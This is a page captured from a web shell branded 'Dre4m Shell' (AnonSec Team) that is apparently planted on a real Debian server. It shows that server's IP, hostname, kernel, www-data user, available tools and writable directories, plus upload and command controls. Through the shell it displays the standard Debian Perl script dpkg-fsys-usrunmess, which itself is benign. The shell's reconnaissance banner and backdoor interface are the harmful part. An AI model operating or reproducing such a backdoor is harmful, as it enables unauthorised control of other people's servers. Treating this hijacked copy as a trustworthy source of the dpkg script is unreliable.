Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.138.134.106
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /sbin/dpkg-fsys-usrunmess
#!/usr/bin/perl
#
# dpkg-fsys-usrunmess - Undoes the merged-/usr-via-aliased-dirs mess
#
# Copyright © 2020-2021 Guillem Jover <guillem@debian.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>

use strict;
use warnings;
use feature qw(state);

our ($PROGNAME) = $0 =~ m{(?:.*/)?([^/]*)};
our $PROGVERSION = '1.21.22';
our $ADMINDIR = '/var/lib/dpkg';

use POSIX;
use File::Temp qw(tempdir);
use File::Find;
use Getopt::Long qw(:config posix_default bundling_values no_ignorecase);

eval q{
    pop @INC if $INC[-1] eq '.';
    use File::FcntlLock;
};
if ($@) {
    fatal('missing File::FcntlLock module; please install libfile-fcntllock-perl');
}

my $opt_noact = length $ENV{DPKG_USRUNMESS_NOACT} ? 1 : 0;
my $opt_prompt = 0;
my $opt_prevent = -1;

my @options_spec = (
    'help|?' => sub { usage(); exit 0; },
    'version' => sub { version(); exit 0; },
    'dry-run|no-act|n' => \$opt_noact,
    'prompt|p' => \$opt_prompt,
    'prevention!' => \$opt_prevent,
);

{
    local $SIG{__WARN__} = sub { usageerr($_[0]) };
    GetOptions(@options_spec);
}

# Set a known umask.
umask 0022;

my @aliased_dirs;

#
# Scan all dirs under / and check whether any are aliased to /usr.
#

foreach my $path (glob '/*') {
    debug("checking symlink? $path");
    next unless -l $path;
    debug("checking merged-usr symlink? $path");
    my $symlink = readlink $path;
    next unless $symlink eq "usr$path" or $symlink eq "/usr$path";
    debug("merged-usr breakage, queueing $path");
    push @aliased_dirs, $path;
}

if (@aliased_dirs == 0) {
    print "System is fine, no aliased directories found, congrats!\n";
    exit 0;
}

#
# dpkg consistency checks
#

debug('checking dpkg database consistency');
system(qw(dpkg --audit)) == 0
    or fatal("cannot audit the dpkg database: $!");

debug('checking whether dpkg has been interrupted');
if (glob "$ADMINDIR/updates/*") {
    fatal('dpkg is in an inconsistent state, please fix that');
}

$opt_prevent = prompt('Generate and install a regression prevention package')
    if $opt_prevent < 0;

if ($opt_prevent) {
    debug('building regression prevention measures');
    my $tmpdir = tempdir(CLEANUP => 1, TMPDIR => 1);
    my $pkgdir = "$tmpdir/pkg";
    my $pkgfile = "$tmpdir/dpkg-fsys-usrunmess.deb";

    mkdir "$pkgdir" or fatal('cannot create temporary package directory');
    mkdir "$pkgdir/DEBIAN" or fatal('cannot create temporary directory');
    open my $ctrl_fh, '>', "$pkgdir/DEBIAN/control"
        or fatal('cannot create temporary control file');
    print { $ctrl_fh } <<"CTRL";
Package: dpkg-fsys-usrunmess
Version: $PROGVERSION
Architecture: all
Protected: yes
Multi-Arch: foreign
Section: admin
Priority: optional
Maintainer: Dpkg Developers <debian-dpkg\@lists.debian.org>
Installed-Size: 5
Conflicts: usrmerge
Provides: usrmerge (= 25)
Replaces: usrmerge
Description: prevention measure to avoid unsuspected filesystem breakage
 This package will prevent automatic migration of the filesystem to the
 broken merge-/usr-via-aliased-dirs via the usrmerge package.
 .
 This package was generated and installed by the dpkg-fsys-usrunmess(8)
 program.

CTRL
    close $ctrl_fh or fatal('cannot write temporary control file');

    system(('dpkg-deb', '-b', $pkgdir, $pkgfile)) == 0
        or fatal('cannot create prevention package');

    if (not $opt_noact) {
        system(('dpkg', '-GBi', $pkgfile)) == 0
            or fatal('cannot install prevention package');
    }
} else {
    print "Will not generate and install a regression prevention package.\n";
}

my $aliased_regex = '^(' . join('|', @aliased_dirs) . ')/';

#
# Get a list of all paths (including diversion) under the aliased dirs.
#

my @search_args;
my %aliased_pathnames;
foreach my $dir (@aliased_dirs) {
    push @search_args, "$dir/*";
}

# We also need to track /usr/lib/modules to then be able to compute its
# complement when looking for untracked kernel module files under aliased
# dirs.
my %usr_mod_pathnames;
push @search_args, '/usr/lib/modules/*';

open my $fh_paths, '-|', 'dpkg-query', '--search', @search_args
    or fatal("cannot execute dpkg-query --search: $!");
while (<$fh_paths>) {
    if (m/^diversion by [^ ]+ from: .*$/) {
        # Ignore.
    } elsif (m/^diversion by [^ ]+ to: (.*)$/) {
        if (-e $1) {
            add_pathname($1, 'diverted pathname');
        }
    } elsif (m/^.*: (.*)$/) {
        add_pathname($1, 'pathname');
    }
}
close $fh_paths;

#
# Get a list of all update-alternatives under the aliased dirs.
#

my @selections = qx(update-alternatives --get-selections);
foreach my $selection (@selections) {
    my $name = (split(' ', $selection))[0];
    my $slaves = 0;

    open my $fh_alts, '-|', 'update-alternatives', '--query', $name
        or fatal("cannot execute update-alternatives --query: $!");
    while (<$fh_alts>) {
        if (m/^\s*$/) {
            last;
        } elsif (m/^Link: (.*)$/) {
            add_pathname($1, 'alternative link');
        } elsif (m/^Slaves:\s*$/) {
            $slaves = 1;
        } elsif ($slaves and m/^\s\S+\s(\S+)$/) {
            add_pathname($1, 'alternative slave');
        } else {
            $slaves = 0;
        }
    }
    close $fh_alts;
}

#
# Unfortunately we need to special case untracked kernel module files,
# as these are required for system booting. To reduce potentially moving
# undesired non-kernel module files (such as apache, python or ruby ones),
# we only look for sub-dirs starting with a digit, which should match for
# both Linux and kFreeBSD modules, and also for the modprobe.conf filename.
#

find({
    no_chdir => 1,
    wanted => sub {
        my $path = $_;

        if (exists $aliased_pathnames{$path}) {
            # Ignore pathname already handled.
        } elsif (exists $usr_mod_pathnames{"/usr$path"}) {
            # Ignore pathname owned elsewhere.
        } elsif ($path eq '/lib/modules' or
                 $path eq '/lib/modules/modprobe.conf' or
                 $path =~ m{^/lib/modules/[0-9]}) {
            add_pathname($path, 'untracked modules');
        }
    },
}, '/lib/modules');


my $sroot = '/.usrunmess';
my @relabel;

#
# Create a shadow hierarchy under / for the new unmessed dir:
#

debug("creating shadow dir = $sroot");
mkdir $sroot
    or sysfatal("cannot create directory $sroot");
foreach my $dir (@aliased_dirs) {
    debug("creating shadow dir = $sroot$dir");
    mkdir "$sroot$dir"
        or sysfatal("cannot create directory $sroot$dir");
    chmod 0755, "$sroot$dir"
        or sysfatal("cannot chmod 0755 $sroot$dir");
    chown 0, 0, "$sroot$dir"
        or sysfatal("cannot chown 0 0 $sroot$dir");
    push @relabel, "$sroot$dir";
}

#
# Populate the split dirs with hardlinks or copies of the objects from
# their counter-parts in /usr.
#

foreach my $pathname (sort keys %aliased_pathnames) {
    my (@meta) = lstat $pathname
        or sysfatal("cannot lstat object $pathname for shadow hierarchy");

    if (-d _) {
        my $mode = $meta[2];
        my ($uid, $gid) = @meta[4, 5];
        my ($atime, $mtime, $ctime) = @meta[8, 9, 10];

        debug("creating shadow dir = $sroot$pathname");
        mkdir "$sroot$pathname"
            or sysfatal("cannot mkdir $sroot$pathname");
        chmod $mode, "$sroot$pathname"
            or sysfatal("cannot chmod $mode $sroot$pathname");
        chown $uid, $gid, "$sroot$pathname"
            or sysfatal("cannot chown $uid $gid $sroot$pathname");
        utime $atime, $mtime, "$sroot$pathname"
            or sysfatal("cannot utime $atime $mtime $sroot$pathname");
        push @relabel, "$sroot$pathname";
    } elsif (-f _) {
        debug("creating shadow file = $sroot$pathname");
        copy("/usr$pathname", "$sroot$pathname");
    } elsif (-l _) {
        my $target = readlink "/usr$pathname";

        debug("creating shadow symlink = $sroot$pathname");
        symlink $target, "$sroot$pathname"
            or sysfatal("cannot symlink $target to $sroot$pathname");
        push @relabel, "$sroot$pathname";
    } else {
        fatal("unhandled object type for '$pathname'");
    }
}

#
# Prompt at the point of no return, if the user requested it.
#

if ($opt_prompt) {
    if (!prompt("Shadow hierarchy created at '$sroot', ready to proceed")) {
        print "Aborting migration, shadow hierarchy left in place.\n";
        exit 0;
    }
}

#
# Mark all packages as half-configured so that we can force a mass
# reconfiguration, to trigger any code in maintainer scripts that might
# create files.
#
# XXX: We do this manually by editing the status file.
# XXX: We do this for packages that might not have maintscripts, or might
#      not involve affected directories.
#

debug('marking all dpkg packages as half-configured');
if (not $opt_noact) {
    open my $fh_lock, '>', "$ADMINDIR/lock"
        or sysfatal('cannot open dpkg database lock file');
    my $fs = File::FcntlLock->new(l_type => F_WRLCK);
    $fs->lock($fh_lock, F_SETLKW)
        or sysfatal('cannot get a write lock on dpkg database');

    my $file_db = "$ADMINDIR/status";
    my $file_dbnew = $file_db . '.new';

    open my $fh_dbnew, '>', $file_dbnew
        or sysfatal('cannot open new dpkg database');
    open my $fh_db, '<', $file_db
        or sysfatal('cannot open dpkg database');
    while (<$fh_db>) {
        if (m/^Status: /) {
            s/ installed$/ half-configured/;
        }
        print { $fh_dbnew } $_;
    }
    close $fh_db;
    $fh_dbnew->flush() or sysfatal('cannot flush new dpkg database');
    $fh_dbnew->sync() or sysfatal('cannot fsync new dpkg database');
    close $fh_dbnew or sysfatal('cannot close new dpkg database');

    rename $file_dbnew, $file_db
        or sysfatal('cannot rename new dpkg database');
}

#
# Replace things as quickly as possible:
#

foreach my $dir (@aliased_dirs) {
    debug("making dir backup = $dir.aliased");
    if (not $opt_noact) {
        rename $dir, "$dir.aliased"
            or sysfatal("cannot make backup directory $dir.aliased");
    }

    debug("renaming $sroot$dir to $dir");
    if (not $opt_noact) {
        rename "$sroot$dir", $dir
            or sysfatal("cannot install fixed directory $dir");
    }
}

mac_relabel();

#
# Cleanup backup directories.
#

foreach my $dir (@aliased_dirs) {
    debug("removing backup = $dir.aliased");
    if (not $opt_noact) {
        unlink "$dir.aliased"
            or sysfatal("cannot cleanup backup directory $dir.aliased");
    }
}

my %deferred_dirnames;

#
# Cleanup moved objects.
#

foreach my $pathname (sort keys %aliased_pathnames) {
    my (@meta) = lstat $pathname
        or sysfatal("cannot lstat object $pathname for cleanup");

    if (-d _) {
        # Skip directories as this might be shared by a proper path under the
        # aliased hierearchy. And so that we can remove them in reverse order.
        debug("deferring merged dir cleanup = /usr$pathname");
        $deferred_dirnames{"/usr$pathname"} = 1;
    } else {
        debug("cleaning up pathname = /usr$pathname");
        next if $opt_noact;
        unlink "/usr$pathname"
            or sysfatal("cannot unlink object /usr$pathname");
    }
}

#
# Cleanup deferred directories.
#

debug("cleaning up shadow deferred dir = $sroot");
my $arg_max = POSIX::sysconf(POSIX::_SC_ARG_MAX) // POSIX::_POSIX_ARG_MAX;
my @batch_dirs;
my $batch_size = 0;

foreach my $dir (keys %deferred_dirnames) {
    my $dir_size = length($dir) + 1;
    if ($batch_size + $dir_size < $arg_max) {
        $batch_size += length($dir) + 1;
        push @batch_dirs, $dir;

    } else {
        next;
    }
    next if length $batch_size == 0;

    open my $fh_dirs, '-|', 'dpkg-query', '--search', @batch_dirs
        or fatal("cannot execute dpkg-query --search: $!");
    while (<$fh_dirs>) {
        if (m/^.*: (.*)$/) {
            # If the directory is known by its aliased name, it should not be
            # cleaned up.
            if (exists $deferred_dirnames{$1}) {
                delete $deferred_dirnames{$1};
            }
        }
    }
    close $fh_dirs;

    @batch_dirs = ();
    $batch_size = 0;
}

my @dirs_linger;

if (not $opt_noact) {
    foreach my $dirname (reverse sort keys %deferred_dirnames) {
        next if rmdir $dirname;
        warning("cannot remove shadow directory $dirname: $!");

        push @dirs_linger, $dirname;
    }
}

if (not $opt_noact) {
    debug("cleaning up shadow root dir = $sroot");
    rmdir $sroot
        or warning("cannot remove shadow directory $sroot: $!");
}

#
# Re-configure all packages, so that postinst maintscripts are executed.
#

my $policypath = '/usr/sbin/dpkg-fsys-usrunmess-policy-rc.d';

debug('installing local policy-rc.d');
if (not $opt_noact) {
    open my $policyfh, '>', $policypath
        or sysfatal("cannot create $policypath");
    print { $policyfh } <<'POLICYRC';
#!/bin/sh
echo "$0: Denied action $2 for service $1"
exit 101
POLICYRC
    close $policyfh or fatal("cannot write $policypath");

    my @alt = (qw(/usr/sbin/policy-rc.d policy-rc.d), $policypath, qw(1000));
    system(qw(update-alternatives --install), @alt) == 0
        or fatal("cannot register $policypath");

    system(qw(update-alternatives --set policy-rc.d), $policypath) == 0
        or fatal("cannot select alternative $policypath");
}

debug('reconfiguring all packages');
if (not $opt_noact) {
    local $ENV{DEBIAN_FRONTEND} = 'noninteractive';
    system(qw(dpkg --configure --pending)) == 0
        or fatal("cannot reconfigure packages: $!");
}

debug('removing local policy-rc.d');
if (not $opt_noact) {
    system(qw(update-alternatives --remove policy-rc.d), $policypath) == 0
        or fatal("cannot unregister $policypath: $!");

    unlink $policypath
        or warning("cannot remove $policypath");

    # Restore the selections we saved initially.
    open my $altfh, '|-', qw(update-alternatives --set-selections)
        or fatal('cannot restore alternatives state');
    print { $altfh } $_ foreach @selections;
    close $altfh or fatal('cannot restore alternatives state');
}

print "\n";

if (@dirs_linger) {
    warning('lingering directories that could not be removed:');
    foreach my $dir (@dirs_linger) {
        warning("  $dir");
    }
}

print "Done, hierarchy unmessed, congrats!\n";
print "Rebooting now is very strongly advised.\n";

print "(Note: you might need to run 'hash -r' in your shell.)\n";

1;

##
## Functions
##

sub debug
{
    my $msg = shift;

    print { *STDERR } "D: $msg\n";
}

sub warning
{
    my $msg = shift;

    warn "warning: $msg\n";
}

sub fatal
{
    my $msg = shift;

    die "error: $msg\n";
}

sub sysfatal
{
    my $msg = shift;

    fatal("$msg: $!");
}

sub copy
{
    my ($src, $dst) = @_;

    # Try to hardlink first.
    return if link $src, $dst;

    # If we are on different filesystems, try a copy.
    if ($! == POSIX::EXDEV) {
        # XXX: This will not preserve hardlinks, these would get restored
        # after the next package upgrade.
        system('cp', '-a', $src, $dst) == 0
            or fatal("cannot copy file $src to $dst: $?");
    } else {
        sysfatal("cannot link file $src to $dst");
    }
}

sub mac_relabel
{
    my $has_cmd = 0;
    foreach my $path (split /:/, $ENV{PATH}) {
        if (-x "$path/restorecon") {
            $has_cmd = 1;
            last;
        }
    }
    return unless $has_cmd;

    foreach my $pathname (@relabel) {
        system('restorecon', $pathname) == 0
            or fatal("cannot restore MAC context for $pathname: $?");
    }
}

sub add_pathname
{
    my ($pathname, $origin) = @_;

    if ($pathname =~ m{^/usr/lib/modules/}) {
        debug("tracking $origin = $pathname");
        $usr_mod_pathnames{$pathname} = 1;
    } elsif ($pathname =~ m/$aliased_regex/) {
        debug("adding $origin = $pathname");
        $aliased_pathnames{$pathname} = 1;
    }
}

sub prompt
{
    my $query = shift;

    print "$query (y/N)? ";
    my $reply = <STDIN>;
    chomp $reply;

    return 0 if $reply ne 'y' and $reply ne 'yes';
    return 1;
}

sub version()
{
    printf "Debian %s version %s.\n", $PROGNAME, $PROGVERSION;
}

sub usage
{
    printf
'Usage: %s [<option>...]'
    . "\n\n" .
'Options:
  -p, --prompt         prompt before the point of no return.
      --prevention     enable regression prevention package installation.
      --no-prevention  disable regression prevention package installation.
  -n, --no-act         just check and create the new structure, no switch.
      --dry-run        ditto.
  -?, --help           show this help message.
      --version        show the version.'
    . "\n", $PROGNAME;
}

sub usageerr
{
    my $msg = shift;

    state $printforhelp = 'Use --help for program usage information.';

    $msg = sprintf $msg, @_ if @_;
    warn "$PROGNAME: error: $msg\n";
    warn "$printforhelp\n";
    exit 2;
}

Anon7 - 2022
AnonSec Team